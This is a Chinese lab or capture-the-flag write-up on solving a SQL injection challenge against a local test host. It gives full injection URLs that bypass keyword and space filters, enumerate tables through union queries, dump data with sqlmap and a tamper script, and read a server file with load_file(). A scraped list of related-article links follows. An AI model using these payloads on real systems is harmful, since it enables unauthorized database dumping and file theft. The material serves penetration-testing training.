SQL注入题型(手工注入+sqlmap)
题目:通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件
目录
题目:通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件
首先进行手工注入(用’以及and或者or来进行查看是否可以进行手工注入)
用sqlmap工具进行注入:(-u指定注入的网站链接,--tamper指定防止过滤关键字符,例如空格、union)
发现并没有要找的数据,回归题目:通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件中。
首先进行手工注入(用’以及and或者or来进行查看是否可以进行手工注入)
可以看到id=1的回显页面,结合回显语句发现该页面屏蔽了union、<?php?>、空格
所以:
- 用/**/来显示空格
- 用union双写绕过
输入url:http://192.168.129.128:81/vulnerabilities/fu1.php?id=1')#
执行语句为:select * from article where id= ('1')#')
去order by查字段、判断只有4个字段
http://192.168.129.128:81/vulnerabilities/fu1.php?id=1')/**/order/**/by/**/4#
显示回显页面
http://192.168.129.128:81/vulnerabilities/fu1.php?id=1')/**/order/**/by/**/5#
不显示回显页面
然后用union联合注入查询:
http://192.168.129.128:81/vulnerabilities/fu1.php?id=-1')/**/uniunionon/**/select/**/1,2,3,4#
进行爆表与爆库以及字段:(group_concat()函数:把分行的字段内容都显示为一行)
1、select group_concat(table_name) from information_schema.tables where table_schema=database()
- 爆表名:
http://192.168.129.128:81/vulnerabilities/fu1.php?id=-1%27)/**/uniunionon/**/select/**/1,2,(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()),4%23
- 数据库:information_schema
- 表:tables
- 字段:table_name
2、select group_concat(column_name) from information_schema.columns where table_name='表名'
- 爆字段:
http://192.168.129.128:81/vulnerabilities/fu1.php?id=-1%27)/**/uniunionon/**/select/**/1,2,(select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/column_name=%27article%27),4%23
- 数据库:infomation_schema
- 表:columns
- 字段:column_name
可以推断出:
- 当前数据库`2web`
- 当前表article
- article字段有id,title,content,author
用sqlmap工具进行注入:(-u指定注入的网站链接,--tamper指定防止过滤关键字符,例如空格、union)
python sqlmap.py -u "http://192.168.129.128:81/vulnerabilities/fu1.php?id=1" --tamper "F:\资料\CISP-PTE\工具包\注入工具\sqlmap\tamper\space2comment.py"
注入类型为:boolean-based blind、time-based blind
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: id=1') AND 1028=1028 AND ('OXUg'='OXUgType: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: id=1') AND (SELECT 7895 FROM (SELECT(SLEEP(5)))sSoM) AND ('YhuC'='YhuC
---
列出数据库:
python sqlmap.py -u "http://192.168.129.128:81/vulnerabilities/fu1.php?id=1" --tamper "F:\资料\CISP-PTE\工具包\注入工具\sqlmap\tamper\space2comment.py" --dbs
列出`2web`数据库中的表
python sqlmap.py -u "http://192.168.129.128:81/vulnerabilities/fu1.php?id=1" --tamper "F:\资料\CISP-PTE\工具包\注入工具\sqlmap\tamper\space2comment.py" -D `2web` --tables
列出`2web`数据库的article表中的内容:
python sqlmap.py -u "http://192.168.129.128:81/vulnerabilities/fu1.php?id=1" --tamper "F:\资料\CISP-PTE\工具包\注入工具\sqlmap\tamper\space2comment.py" -D `2web` -T article --dump
发现并没有要找的数据,回归题目:通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件中。
已知文件的绝对路径,直接去进行load_file()函数查看本地文件
http://192.168.129.128:81/vulnerabilities/fu1.php?id=-1')/**/uniunionon/**/select/**/1,2,load_file('/tmp/360/key'),4#
最终找到了key8的值
SQL注入题型(手工注入+sqlmap)相关推荐
- 【愚公系列】2023年05月 网络安全高级班 065.WEB渗透与安全(SQL注入漏洞-手工注入)
文章目录 前言 一.SQL注入漏洞-手工注入 1.错误注入 2.布尔注入 2.1 通过`'or 1=1 --` 注入 2.2 通过`admin'or 1=1 --` 注入 3.联合注入 3.1 查看u ...
- mysql报错型手工注入_mysql手工注入教程
大家早上好!,H.U.C-枫 又和大家见面啦// 本来早想做这个教程的,因为前段时间做过一套mssql的手工注入教程.今天给大家带来的是php+mysql 手工注入.临时找了个点,所以有些东西不能全给 ...
- mssql注入和mysql注入_mssql手工注入
mssql注入是针对于sql server数据库的 sql server数据库和mysql数据库是有所区别的,语句命令之类的可自行百度. 平台:i春秋 内容:mssql手工注入 找注入点 点击test ...
- mysql 4.0手工注入_手工注入——MySQL手工注入实战和分析
前言 今天进行了MySQL手工注入实战,分享一下自己的实战过程和总结,这里环境使用的是墨者学院的在线靶场.话不多说,咱们直接开始. 判断注入点 通过 ' 和构造 and 1=1 和 and 1=2 查 ...
- mysql报错注入实战_手工注入——MySQL手工注入实战和分析
今天进行了MySQL手工注入实战,分享一下自己的实战过程和总结,这里环境使用的是墨者学院的在线靶场.话不多说,咱们直接开始. 第一步,判断注入点 通过 ' 和构造 and 1=1 和 and 1=2 ...
- [网络安全提高篇] 一〇六.SQL注入之手工注入和SQLMAP入门案例详解
当您阅读到该篇文章时,作者已经将"网络安全自学篇"设置成了收费专栏,首先说声抱歉.感谢这一年来大家的阅读和陪伴,这100篇安全文章记录了自己从菜鸡到菜鸟的成长史,该部分知识也花了很 ...
- 【SQL注入】手工注入常用语句合集
直接就能用的常用语句 一.注入前的准备:爆闭合 0x1 整形的闭合 SELECT * FROM users WHERE id=$id LIMIT 0,1?id=3 #用户输入 3 ?id=3 -- - ...
- write up:web 实战2-注入--sql注入(手工注入详细版)
0x00查找注入点 我是通过展开html标签来找注入点的 注入点 www.kabelindo.co.id/readnews.php?id=28 下面开始盘它!!! 0x01 手动注入 先确定字段数目 ...
- python sql注入脚本_python辅助sql手工注入猜解数据库案例分析
发现存在sql注入漏洞 简单一点可以直接用sqlmap工具暴库 但是如果想深入理解sql注入的原理,可以尝试手工注入,配合python脚本实现手工猜解数据库 首先hachbar开启 获取cms登录后的 ...
最新文章
- Response.getWriter() 和Response.getOutputStream冲突
- centertrack
- Action profile: ZAVADDR和ZAVPERS
- java台球游戏设计原理_Java实现简单台球游戏
- sparkstreaming 读取mysql_SparkStreaming读取Kafka的两种方式
- Hibernate异常之关键字错误
- Java高级面试题!这是一份面向Java开发者的复习指南
- Sublime Text 3 Plugin Better!
- java ajax框架_ajax框架之 zk -demo1
- HDU 6098 Inversion 思维
- 渗透第一个靶机 shop1.0 (还是简单渗透版)
- python算法书籍-推荐 10 本程序员必读的算法书
- Python根据地名获取经纬度
- python智能抠图
- 问卷调查怎么帮助餐饮行业?
- win7计算机网络机组用户名,win7连接局域网时的用户名及网络密码是什么?
- iOS7下的drawInRect的新方法drawInRect:withAttributes:使用
- Python 快速打开网页
- 使用Java生成带有下划线字体的文字
- 软件产业向互联网转型正当时
热门文章
- 不能装载文档控件。请在检查浏览器的选项中检查浏览器的安全设置_网络安全科普 | 如何正确设置浏览器!...
- OpenBMC环境搭建及测试
- Arduino UNO AT24C32进行字符串数据读写【优化篇】
- yolov5 代码内容解析
- HADOOP KMS使用介绍及性能测试
- Mac下文本编辑器无法生成html文件
- dot.tk+namecheap.com搭建免费顶级域名+快速动态域名+Dns解析
- C#大作业(FPS大型单机游戏)笔记简记
- 今天14:00 | NeurIPS 专场一 青年科学家专场
- eclipse设置pom.xml打开方式,显示dependences视图